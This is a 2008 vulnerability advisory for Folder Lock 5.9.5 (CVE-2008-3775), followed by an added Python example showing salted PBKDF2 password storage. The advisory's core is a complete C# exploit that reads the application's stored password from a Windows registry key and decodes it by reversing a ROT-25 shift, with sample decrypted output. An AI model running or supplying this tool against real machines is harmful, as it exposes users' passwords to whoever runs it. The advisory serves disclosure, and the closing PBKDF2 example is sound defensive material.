Folder Lock <= 5.9.5 Local Password Information Disclosure
2008-08-20 / 2008-08-21
Credit: Charalambous Glafkos
Risk: Low
Local: Yes
Remote: No
CVE: CVE-2008-3775
CWE: CWE-310
CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Access required: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None
/*
 * Folder Lock <= 5.9.5 Local Password Information Disclosure
 *
 * Author(s): Charalambous Glafkos
 *            George Nicolaou
 * Date: June 19, 2008
 * Site: http://www.astalavista.com
 * Mail: glafkos_at_astalavista.com
 *       ishtus_at_astalavista.com
 *
 * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability.
 * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks.
 * The security issue is caused due to the application storing access credentials within the Windows registry key:
 * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption.
 * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed.
 *
 * Sample Output:
 *
 * ASTALAVISTA the hacking & security community
 * Folder Lock <= 5.9.5 Decrypter v2.0
 * ---------------------------------
 * Encrypted Password: :3<k_^62`4T-
 * Decrypted Password: ,S3_15]^j;29
 *
 */

using System;
using System.Text;
using System.IO;
using System.Threading;
using Microsoft.Win32;

namespace getRegistryValue
{
    class getValue
    {
        static void Main()
        {
            getValue details = new getValue();
            Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n");
            Console.WriteLine("Folder Lock <= 5.9.5 Decrypter v2.0");
            Console.WriteLine("---------------------------------");
            String strFL = details.getFL();
            Console.WriteLine(strFL);
            Thread.Sleep(5000);
        }

        private string getFL()
        {
            RegistryKey FLKey = Registry.CurrentUser;
            FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false);
            String _pack = FLKey.GetValue("_pack").ToString();
            String strFL = "Encrypted Password: " + _pack.Replace("~", "") +
                           "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n";
            return strFL;
        }

        public string Reverse(string x)
        {
            char[] charArray = new char[x.Length];
            int len = x.Length - 1;
            for (int i = 0; i <= len; i++)
                charArray[i] = x[len - i];
            return new string(charArray);
        }

        public static string Rotate(string toRotate)
        {
            char[] charArray = toRotate.ToCharArray();
            for (int i = 0; i < charArray.Length; i++)
            {
                int thisInt = (int)charArray[i];
                if (thisInt >= 65 && thisInt <= 91)
                {
                    thisInt += 25;
                    if (thisInt >= 91) { thisInt -= 26; }
                }
                if (thisInt >= 92 && thisInt <= 96)
                {
                    thisInt += 25;
                    if (thisInt >= 96) { thisInt -= 26; }
                }
                if (thisInt >= 32 && thisInt <= 47)
                {
                    thisInt += 25;
                    if (thisInt >= 47) { thisInt -= 26; }
                }
                if (thisInt >= 48 && thisInt <= 57)
                {
                    thisInt += 25;
                    if (thisInt >= 57) { thisInt -= 26; }
                }
                if (thisInt >= 58 && thisInt <= 64)
                {
                    thisInt += 25;
                    if (thisInt >= 64) { thisInt -= 26; }
                }
                if (thisInt >= 97 && thisInt <= 123)
                {
                    thisInt += 25;
                    if (thisInt >= 123) { thisInt -= 26; }
                }
                charArray[i] = (char)thisInt;
            }
            return new string(charArray);
        }
    }
}

Best Regards,
Charalambous Glafkos ( nowayout )
References:
http://www.securityfocus.com/bid/30771
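
The root cause in the advisory is that the stored password is only encoded with a keyless transform, so any process that can read the value can recover it. The added example below (not part of the original advisory and not the vendor's code) contrasts a constructed stand-in reversible encoding with a salted PBKDF2 verifier. It assumes the application only needs to check the password, that passwords are printable ASCII for the toy encoding, and all function names, the iteration count and the sample value are hypothetical.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a keyless, reversible encoding (NOT Folder Lock's
# exact routine): shift each printable ASCII character, then reverse.
def toy_obfuscate(password: str, shift: int = 25) -> str:
    shifted = [chr(32 + (ord(c) - 32 + shift) % 95) for c in password]
    return "".join(reversed(shifted))

def toy_deobfuscate(stored: str, shift: int = 25) -> str:
    # Anyone who can read the stored value can undo it: no secret is involved.
    return "".join(chr(32 + (ord(c) - 32 - shift) % 95) for c in reversed(stored))

PBKDF2_ITERATIONS = 600_000  # assumption: tune to the target hardware

def make_verifier(password: str) -> dict:
    """Return a record that can check a password but does not contain it."""
    salt = os.urandom(16)  # fresh random salt per record
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, PBKDF2_ITERATIONS)
    return {"alg": "pbkdf2-sha256", "iter": PBKDF2_ITERATIONS,
            "salt": salt.hex(), "hash": digest.hex()}

def check_password(candidate: str, record: dict) -> bool:
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                                 bytes.fromhex(record["salt"]), record["iter"])
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(digest, bytes.fromhex(record["hash"]))

if __name__ == "__main__":
    secret = "Constructed-Passw0rd!"  # constructed sample value
    stored_weak = toy_obfuscate(secret)
    print("weak stored value  :", stored_weak)
    print("recovered by reader:", toy_deobfuscate(stored_weak))
    record = make_verifier(secret)
    print("verifier record    :", record)
    print("correct password   :", check_password(secret, record))
    print("wrong password     :", check_password("guess", record))
```

The verifier record can sit in a user-readable location because recovering the password from it requires guessing candidates at the cost of the full key-derivation work per guess.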